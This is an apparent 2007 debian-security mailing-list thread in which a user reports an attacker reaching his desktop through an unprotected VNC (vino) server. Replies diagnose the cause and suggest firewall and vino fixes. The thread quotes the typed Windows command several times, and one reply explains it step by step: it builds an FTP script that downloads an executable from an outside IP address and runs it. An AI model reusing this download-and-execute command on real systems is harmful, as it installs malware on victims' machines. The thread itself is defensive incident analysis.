Re: spooky windows script

2007-05-09 Thread Lee Braiden
On Tuesday 08 May 2007 22:34:30 Gerardo Curiel wrote:
 El mar, 08-05-2007 a las 22:24 +0200, Thomas Hochstein escribió:
  Chris Adams schrieb:
   Do you have a VNC server installed?
  
  | But I do have vino-server running.
 
  Yes.

 That's the problem, the same happened to me a couple of weeks ago, in my
 Desktop(a newly installed Debian Unstable).

 Vino seems to open the vnc port to the outside without password when
 installed by default.

I would say the problem is more that his system is configured to allow any 
servers without explicit authorisation.  That could just as easily have been 
a trojan or rootkit opening a port.  Best to setup your firewall to block all 
incoming connections by default, and explicitly allow only what your system 
is actually serving, and only to machines it needs to serve.

-- 
Lee



Re: spooky windows script

2007-05-09 Thread Jan Outhuis

That's just what I've done: closed the vnc-holes in my firewall (btw it does 
use a blacklist on incoming connections), and configured the vino-server to not 
be running by default and when it runs to not accept any unauthorised 
connections.

Let's see if that does the trick.

Greetings,

Jan

 Datum: 09/05/07 08:11 AM
 Van: Lee Braiden [EMAIL PROTECTED]
 Aan: debian-security@lists.debian.org
 CC: 
 Onderwerp : Re: spooky windows script
 
 On Tuesday 08 May 2007 22:34:30 Gerardo Curiel wrote:
  El mar, 08-05-2007 a las 22:24 +0200, Thomas Hochstein escribió:
   Chris Adams schrieb:
Do you have a VNC server installed?
   
   | But I do have vino-server running.
  
   Yes.
 
  That's the problem, the same happened to me a couple of weeks ago, in my
  Desktop(a newly installed Debian Unstable).
 
  Vino seems to open the vnc port to the outside without password when
  installed by default.
 
 I would say the problem is more that his system is configured to allow any 
 servers without explicit authorisation.  That could just as easily have been 
 a trojan or rootkit opening a port.  Best to setup your firewall to block all 
 incoming connections by default, and explicitly allow only what your system 
 is actually serving, and only to machines it needs to serve.
 
 -- 
 Lee
 
 




spooky windows script

2007-05-08 Thread Jan Outhuis
Hello,

Recently I'm repeatedly being pestered by a strange event while surfing the 
net. My cursor is taken over and the following code is typed:

%systemroot%\system32\cmd.exe
cmd /c echo open 59.31.153.120 22783  ik echo user db database  ik echo 
get 1.exe  ik echo bye  ik ftp -n -v -s:ik del ik 1.exe exit

(I see on my network monitor that this is coming from outside; IP-number and 
user name vary.)

After that all is back to normal.

Now this is of course a nuisance, but is it also a thread? And what can be done 
against it?

Anybody got a clue on this?

Tia,

Jan Outhuis



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Re: spooky windows script

2007-05-08 Thread Dale Amon
On Tue, May 08, 2007 at 02:57:24PM +0200, Jan Outhuis wrote:
 %systemroot%\system32\cmd.exe
 cmd /c echo open 59.31.153.120 22783  ik echo user db database  ik echo 
 get 1.exe  ik echo bye  ik ftp -n -v -s:ik del ik 1.exe exit

If you were running a windows system this might
do something really nasty since it creates a download
script and executes it. Perhaps to pull in a root kit?. 
I haven't done DOS in a long time so I am a bit shaky 
in fully interpreting.

Check for something named 1.exe in your directory.


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Re: spooky windows script

2007-05-08 Thread Henri Salo
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On Tue,  8 May 2007 14:57:24 +0200 (CEST)
Jan Outhuis [EMAIL PROTECTED] wrote:

 Hello,
 
 Recently I'm repeatedly being pestered by a strange event while
 surfing the net. My cursor is taken over and the following code is
 typed:
 
 %systemroot%\system32\cmd.exe
 cmd /c echo open 59.31.153.120 22783  ik echo user db database 
 ik echo get 1.exe  ik echo bye  ik ftp -n -v -s:ik del ik
 1.exe exit
 
 (I see on my network monitor that this is coming from outside;
 IP-number and user name vary.)
 
 After that all is back to normal.
 
 Now this is of course a nuisance, but is it also a thread? And what
 can be done against it?
 
 Anybody got a clue on this?
 
 Tia,
 
 Jan Outhuis
 

Do you have any kind of VNC-servers running? What is you ip-address?
Can i scan your open ports from it?

- ---
Henri Salo fgeek at fgeek.fi +358407705733
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Re: spooky windows script

2007-05-08 Thread Celejar
On Tue,  8 May 2007 14:57:24 +0200 (CEST)
Jan Outhuis [EMAIL PROTECTED] wrote:

 Hello,
 
 Recently I'm repeatedly being pestered by a strange event while surfing the 
 net. My cursor is taken over and the following code is typed:
 
 %systemroot%\system32\cmd.exe
 cmd /c echo open 59.31.153.120 22783  ik echo user db database  ik echo 
 get 1.exe  ik echo bye  ik ftp -n -v -s:ik del ik 1.exe exit
 
 (I see on my network monitor that this is coming from outside; IP-number and 
 user name vary.)
 
 After that all is back to normal.
 
 Now this is of course a nuisance, but is it also a thread? And what can be 
 done against it?
 
 Anybody got a clue on this?
 
 Tia,
 
 Jan Outhuis

Are you running linux or windows? With what program are you surfing?
Where is that text displayed? The cmd.exe line looks like someone
trying to open the windows command shell; the next line looks like
someone trying to capture some data from your system and ftp it
outwards. I'm just guessing, but it does appear to be a threat.

Celejar
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Re: spooky windows script

2007-05-08 Thread andersen

If this occurred on my Windows box, I would back up what needs to be backed up
and reload the OS with something useful.  Your machine has clearly been
compromised.



-- 

On Tue, 8 May 2007, Celejar wrote:

On Tue,  8 May 2007 14:57:24 +0200 (CEST)
Jan Outhuis [EMAIL PROTECTED] wrote:

 Hello,

 Recently I'm repeatedly being pestered by a strange event while surfing the 
 net. My cursor is taken over and the following code is typed:

 %systemroot%\system32\cmd.exe
 cmd /c echo open 59.31.153.120 22783  ik echo user db database  ik echo 
 get 1.exe  ik echo bye  ik ftp -n -v -s:ik del ik 1.exe exit

 (I see on my network monitor that this is coming from outside; IP-number and 
 user name vary.)

 After that all is back to normal.

 Now this is of course a nuisance, but is it also a thread? And what can be 
 done against it?

 Anybody got a clue on this?

 Tia,

 Jan Outhuis

Are you running linux or windows? With what program are you surfing?
Where is that text displayed? The cmd.exe line looks like someone
trying to open the windows command shell; the next line looks like
someone trying to capture some data from your system and ftp it
outwards. I'm just guessing, but it does appear to be a threat.

Celejar
--
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ssuds.sourceforge.net - A Simple Sudoku Solver and Generator




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Re: spooky windows script

2007-05-08 Thread Stephan Loh
hi,

 %systemroot%\system32\cmd.exe
 cmd /c echo open 59.31.153.120 22783  ik echo user db database  ik echo 
 get 1.exe  ik echo bye  ik ftp -n -v -s:ik del ik 1.exe exit

to clarify what this command line does:

it writes the following text lines in a file called ik:

open 59.31.153.120 22783
user db database
get 1.exe
bye

this are FTP commands, which are now being executed by the windows FTP
client. the parameters -n -v suppresses user autologin and verboseness
and the parameter -s:ik executes the content of the file ik as FTP
commands. the file ftp://db:[EMAIL PROTECTED]:22783/1.exe is being
fetched, the file ik is then being deleted and finally the file
1.exe is being executed. i suppose that 1.exe is some kind of windows
trojan or virus.

cheers,
-stephan loh
 

On 2007.05.08 15:39, Celejar wrote:
 On Tue,  8 May 2007 14:57:24 +0200 (CEST)
 Jan Outhuis [EMAIL PROTECTED] wrote:
 
  Hello,
  
  Recently I'm repeatedly being pestered by a strange event while surfing the 
  net. My cursor is taken over and the following code is typed:
  
  %systemroot%\system32\cmd.exe
  cmd /c echo open 59.31.153.120 22783  ik echo user db database  ik 
  echo get 1.exe  ik echo bye  ik ftp -n -v -s:ik del ik 1.exe exit
  
  (I see on my network monitor that this is coming from outside; IP-number 
  and user name vary.)
  
  After that all is back to normal.
  
  Now this is of course a nuisance, but is it also a thread? And what can be 
  done against it?
  
  Anybody got a clue on this?
  
  Tia,
  
  Jan Outhuis
 
 Are you running linux or windows? With what program are you surfing?
 Where is that text displayed? The cmd.exe line looks like someone
 trying to open the windows command shell; the next line looks like
 someone trying to capture some data from your system and ftp it
 outwards. I'm just guessing, but it does appear to be a threat.
 
 Celejar
 --
 mailmin.sourceforge.net - remote access via secure (OpenPGP) email
 ssuds.sourceforge.net - A Simple Sudoku Solver and Generator
 
 
 -- 
 To UNSUBSCRIBE, email to [EMAIL PROTECTED]
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Re: spooky windows script

2007-05-08 Thread David Clymer
On Tue, 2007-05-08 at 14:57 +0200, Jan Outhuis wrote:
 Hello,
 
 Recently I'm repeatedly being pestered by a strange event while surfing the 
 net. My cursor is taken over and the following code is typed:
 
 %systemroot%\system32\cmd.exe
 cmd /c echo open 59.31.153.120 22783  ik echo user db database  ik echo 
 get 1.exe  ik echo bye  ik ftp -n -v -s:ik del ik 1.exe exit
 
 (I see on my network monitor that this is coming from outside; IP-number and 
 user name vary.)
 
 After that all is back to normal.
 
 Now this is of course a nuisance, but is it also a thread? And what can be 
 done against it?
 
 Anybody got a clue on this?
 

I'm sure someone has a clue. However, clued listmembers or not, a
windows security issue is not an appropriate topic for discussion on a
mailing list called debian-security. As the name implies, this list is
for discussing security issues as they relate to the Debian GNU/Linux
distribution.

-davidc

--
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Re: spooky windows script

2007-05-08 Thread Jan Outhuis



 Well,
 
 to specify on this, I am running Debian testing, and surfing with Firefox 2.0.
 
 The script gets typed in any window that's active at the moment the cursor is 
 being taken over: it may be the Firefox 'find'-field or a terminal window for 
 that matter.
 
 I've checked my filesystem and no 1.exe file seems to be present.
 
 My IP-address is assigned dynamically by my ISP; it differs every time I log 
 in. But I do have vino-server running. I'm going to check on that.
 
 thanks
 
  Datum: 08/05/07 04:15 PM
  Van: David Clymer [EMAIL PROTECTED]
  Aan: debian-security@lists.debian.org
  CC: 
  Onderwerp : Re: spooky windows script
  
  On Tue, 2007-05-08 at 14:57 +0200, Jan Outhuis wrote:
   Hello,
   
   Recently I'm repeatedly being pestered by a strange event while surfing 
   the net. My cursor is taken over and the following code is typed:
   
   %systemroot%\system32\cmd.exe
   cmd /c echo open 59.31.153.120 22783  ik echo user db database  ik 
   echo get 1.exe  ik echo bye  ik ftp -n -v -s:ik del ik 1.exe 
   exit
   
   (I see on my network monitor that this is coming from outside; IP-number 
   and user name vary.)
   
   After that all is back to normal.
   
   Now this is of course a nuisance, but is it also a thread? And what can 
   be done against it?
   
   Anybody got a clue on this?
   
  
  I'm sure someone has a clue. However, clued listmembers or not, a
  windows security issue is not an appropriate topic for discussion on a
  mailing list called debian-security. As the name implies, this list is
  for discussing security issues as they relate to the Debian GNU/Linux
  distribution.
  
  -davidc
  
  --
  A good hot dog feeds the hand that bites it.
  
  
  -- 
  To UNSUBSCRIBE, email to [EMAIL PROTECTED]
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Re: spooky windows script

2007-05-08 Thread Chris Adams


On May 8, 2007, at 9:17 AM, Jan Outhuis wrote:
The script gets typed in any window that's active at the moment the  
cursor is being taken over: it may be the Firefox 'find'-field or a  
terminal window for that matter.


Do you have a VNC server installed? If so you really want to either  
remove it or configure it to only listen on localhost so you can  
access it over an SSH tunnel but remote attackers can't get in. I'd  
also strongly recommend that you configure the built-in firewall  
since it you may have other exposed services - unfortunately I don't  
have a package recommendation as I just configure iptables directly.


I've seen this happen a couple of times on Macs where people  
inadvertently left VNC open w/o a password with very similar  
behaviour, which suggests people are scanning for vulnerable VNC  
installs but the automated stuff currently only has Windows exploits.


Chris



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Re: spooky windows script

2007-05-08 Thread Celejar
On Tue,  8 May 2007 18:17:08 +0200 (CEST)
Jan Outhuis [EMAIL PROTECTED] wrote:

 
 
 
  Well,
  
  to specify on this, I am running Debian testing, and surfing with Firefox 
  2.0.
  
  The script gets typed in any window that's active at the moment the cursor 
  is being taken over: it may be the Firefox 'find'-field or a terminal 
  window for that matter.
  
  I've checked my filesystem and no 1.exe file seems to be present.
  
  My IP-address is assigned dynamically by my ISP; it differs every time I 
  log in. But I do have vino-server running. I'm going to check on that.
  
  thanks

Just for the record, I apparently interpreted the ftp business backward
in my earlier post; pulling in, not sending out.

Celejar
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Re: spooky windows script

2007-05-08 Thread Thomas Hochstein
Chris Adams schrieb:

 Do you have a VNC server installed? 

| But I do have vino-server running. 

Yes.


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Re: spooky windows script

2007-05-08 Thread Gerardo Curiel
El mar, 08-05-2007 a las 22:24 +0200, Thomas Hochstein escribió:
 Chris Adams schrieb:
 
  Do you have a VNC server installed? 
 
 | But I do have vino-server running. 
 
 Yes.

That's the problem, the same happened to me a couple of weeks ago, in my
Desktop(a newly installed Debian Unstable).

Vino seems to open the vnc port to the outside without password when
installed by default.


 
 

-- 
Gerardo Curiel  [EMAIL PROTECTED]  [EMAIL PROTECTED]
Geek By NaTure,LiNuX By ChOiCe,DebiAn of CoUrsE
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Re: spooky windows script

2007-05-08 Thread Noah Meyerhans
On Tue, May 08, 2007 at 05:34:30PM -0400, Gerardo Curiel wrote:
 El mar, 08-05-2007 a las 22:24 +0200, Thomas Hochstein escribi?:
  Chris Adams schrieb:
  
   Do you have a VNC server installed? 
  
  | But I do have vino-server running. 
 
 That's the problem, the same happened to me a couple of weeks ago, in my
 Desktop(a newly installed Debian Unstable).
 
 Vino seems to open the vnc port to the outside without password when
 installed by default.

No, vino doesn't do anything by default (just confirmed in sid).  What
do you have configured in System - Preferences - Remote Desktop ?  By
default, nobody can connect at all.  Clicking on the only initially
active checkbox (Allow other users to view your desktop) results in a
configuration where other users can connect, but they can't actually
view or control your desktop until you've approved their connection via
a popup dialog.  If you uncheck Ask you for confirmation and neglect
to check Require the user to enter this password and provide a
password, then it seems that unauthenticated, unapproved connections are
allowed.  IMO this should never ever be allowed, but it is.  It's
definitely not the default state, though.

noah



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